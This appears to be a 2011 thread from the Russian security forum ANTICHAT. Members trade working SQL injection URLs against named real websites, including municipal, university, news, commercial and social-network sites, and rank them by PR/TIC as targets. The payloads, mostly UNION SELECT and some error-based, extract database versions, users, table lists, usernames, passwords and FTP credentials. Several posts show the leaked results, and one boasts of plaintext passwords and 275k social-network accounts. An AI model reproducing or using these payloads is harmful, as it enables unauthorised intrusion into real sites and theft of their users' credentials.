HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14081  
Старый 09.07.2011, 17:51
edge911
Участник форума
Регистрация: 21.02.2009
Сообщений: 228
Провел на форуме:
2175726

Репутация: 368
По умолчанию

http://www.townoflakeshore.on.ca/lakeshore_1.php?page=-11(7 колонок)

5.0.67:

lakeshore@172.27.1.10:

lakeshore_lakeshore:

suse-linux-gnu


PR 4

http://www.lakeshore.ca/events.php?id=-722(5 колонок)

5.0.67:

lakeshore@172.27.1.10:

lakeshore_lakeshore:

suse-linux-gnu


PR 4

http://www.hawaii.edu/uhhbiology/index.php?page=person&id=-43(14 колонок)

4.1.20-standard-log:

uhhbiology@web41.pvt.hawaii.edu:

uhhbiology_d:sun-solaris2.8


PR 8

http://www.mycrysis.com/forums/memberlist.php?mode=viewprofile&u=679708%27

(ппц,phpbb 2007, mysqli(4.1++))

PR5
 
Ответить с цитированием

  #14082  
Старый 10.07.2011, 00:23
Bramin
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199

Репутация: 127
Отправить сообщение для Bramin с помощью ICQ
По умолчанию

http://www.gilcentr-sk.ru/?id=-22+union+select+1,2,3,4,5,version(),7,8,9--

http://busexplorer.com/PHP/FeaturePage.php?id=-22+union+select+1,group_concat(0x0b,table_name),3, 4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_ schema.tables--

http://www.taliman-nsk.ru/?page=goodslist&id=-22+union+select+1,group_concat(0x0b,table_name)+fr om+information_schema.tables--
 
Ответить с цитированием

  #14083  
Старый 10.07.2011, 19:25
totenkopf
Guest
Сообщений: n/a
Провел на форуме:
33658

Репутация: 19
По умолчанию

Код:
Code:
http://www.dalsouple.com/News.php?nid=2+and+0+UNION+SELECT+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6+--+
http://www.easyfresh-logistics.com/news.php?nid=2'+and+0+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6+--+
http://www.globestravel.com/php/newsDetails.php?nid=2+and+0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4+--+
http://www.greatecs.com/en/news/details.php?nid=2+and+0+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8+--+
http://www.midrma.com/News.php?nid=2+and+0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4+--+
http://www.molecularpartners.com/tmp2.php?nid=2&sid=5&cid=12+and+0+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8+--+
http://www.music-powerhouse.com/news.php?nid=2'+and+0+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database())+--+
http://www.pacificwestsound.com/news.php?nid=2+and+0+UNION+SELECT+concat_ws(0x3a,user(),version(),database())+--+
http://www.pcgengr.com/news_detail.php?nid=2+and+0+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),version(),database())+--+
http://www.pickcells4pixels.com/index.php?nID=2+and+0+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),version(),database()),13,14+--+
http://www.portmeirion-village.com/content.php?nID=2;lID=1+and+0+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4+--+
 
Ответить с цитированием

  #14084  
Старый 10.07.2011, 23:17
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию

Немного жира.

Московская торгово-промышленная палата.ТИЦ 1600 PR 5

Код:
Code:
http://www.mostpp[это не я].ru/news.php?id=-5805+union+select+concat_ws(0x3a,login,pass)+ from+users+limit+0,1
Имеем инъекцию с выводом в сорце:

Код:
Code:
Вернуться к общему списку сообщений
и как подобает подобным сайтам, с паролями в plaintext.

Ислам для всех. ТИЦ 850 PR 3

Код:
Code:
http://islam.com.[не, посоны - я не разжигаю]ua/admin/modules/articles/print.php?nid=-1+union+select+1,2,3,4,version(),database(),7,8,9,10,user(),12,13
Имеем инъекцию в MySQL 4.1.25 с 3-мя принтабельными полями.

И на закуску - Социальная сеть с over 275к акками на борту.

Код:
Code:
http://www.33hoch[посоны, я не при делах]u.ru/likes.php?id=-122604'+or+1+group+by+concat((select+login+from+user+limit+275000,1),floor(rand(0)*2))having+min(0)+or+1--+
Имеем инъекцию с выводом в ошибке.
 
Ответить с цитированием

  #14085  
Старый 10.07.2011, 23:33
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

pr 3 тиц 60

Цитата:
Сообщение от None  
http://foxconncase.ru/index.php?id=10&model=-86+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,use r(),version(),database()),0,11,12,13,14+--+&series=15&cHash=b165aa222fe72a04b3041cf1274ec1 49
u58908@10.8.0.102:5.0.90-log:u58908

pr 2 тиц 10

Цитата:
Сообщение от None  
http://www.nks24.ru/text.php?id=-24+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6+--+
u99856@78.108.84.161:5.0.90:b99856_nks24

pr 3 тиц 70

Цитата:
Сообщение от None  
http://dead-cities.ru/text.php?id=8600000000000000000'+UnIon+selECt+1,co ncat_ws(0x3a,user(),version(),database())+--+
dbu_kovaldji_1@192.168.9.91:5.0.77-log:db_kovaldji_1

pr 2

Цитата:
Сообщение от None  
http://proishestvie.org/page.php?id=-1'+union+select+1,2,concat_ws(0x3a,user(),version( ),database()),4,5,6,7+--+
lito@localhost:5.1.54-rel12.5-log:lito
 
Ответить с цитированием

  #14086  
Старый 11.07.2011, 19:17
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

www.zacks.com

PR 7

http://www.zacks.com/blog/archive.php?g=-6+union+select+1,2,version%28%29,4,5,6--+
 
Ответить с цитированием

  #14087  
Старый 11.07.2011, 22:06
Melfis
Guest
Сообщений: n/a
Провел на форуме:
195266

Репутация: 53
По умолчанию

pr 3, тиц 70

Код:
Code:
http://www.i-watch.ru/?section=7&sid=-3+union+select+1,2,3,version(),5,6,7--+
5.0.51a-24+lenny4

___

пр: 4, тиц: 30

Код:
Code:
http://www.watch.su/search_cat.php?word=&start=1a&end=20a&where=1)and(select 1 from(select count(*),concat((select version()),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
5.0.33
 
Ответить с цитированием

  #14088  
Старый 12.07.2011, 02:45
GroM88
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186

Репутация: 2
Отправить сообщение для GroM88 с помощью ICQ
По умолчанию

Код:
Code:
http://cluster2.space.swri.edu/article.php?id=-1+union+select+1,2,concat_ws(0x3a,user,password),4,5,6,7,8+from+mysql.user+--+
PR 4

Код:
Code:
http://www.thalictrum.com/index.php?pageid=6&artid=-6+union+select+1,concat_ws(0x3a,id,username,password),3,4,5,6,7,8,9,10,11,12+from+user+--+
4.1.20

PR 4

Код:
Code:
http://www.gp.org/press/pr-state.php?ID=-416'+union+select+version(),2,3,4,5,6+--+
5.0.45-log

тиЦ 30

PR 6

Код:
Code:
http://www.bdnews24.com/details.php?cid=10&id=-195068+union+select+1,2,concat_ws(0x3a,ftpurl,ftpuser,ftppass)+from+ftpsecure--
Инфа выводится справа под блоком фейсбука ))

5.0.45-log

тИЦ 30

PR 5

Код:
Code:
http://www.africasia.com/africanbanker/afbnk.php?ID=-2356+union+select+version(),2,3,4,5,6,7,8,9,10+--+
5.0.84-log

тИЦ 50

PR 6


Код:
Code:
http://www.infovis.net/printMag.php?lang=2&num=-98+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13+--+
5.0.67-Max

тИЦ 10

PR 5
 
Ответить с цитированием

  #14089  
Старый 13.07.2011, 05:31
GroM88
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186

Репутация: 2
Отправить сообщение для GroM88 с помощью ICQ
По умолчанию

Код:
Code:
http://www.mysecret.tv/secret.php?id=3964+union+select+1,2,3,4,concat_ws(0x3a,user_id,username,password,email),6+from+user+--+
5.0.58

тИЦ 10

PR 3


Код:
Code:
http://www.thisweekinpalestine.com/details.php?id=3323&ed=191&edid=-191+union+select+1,concat_ws(0x3a,id,username,email,password),3,4,5+from+members+limit+1,1+--+
5.0.77

тИЦ 10

PR 5
 
Ответить с цитированием

  #14090  
Старый 16.07.2011, 17:24
Kuteke
Guest
Сообщений: n/a
Провел на форуме:
60692

Репутация: 6
По умолчанию

тИЦ 10 PR 1

Код HTML:
HTML:
http://www.lz-studia.ru/index.php?p=111&idp=-4+union+select+1,2,version(),4
тИЦ 10 PR 4

Код HTML:
HTML:
http://www.hobbycenter.by/news.php?id=27+union+select+1,2,3,4,5,6--
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ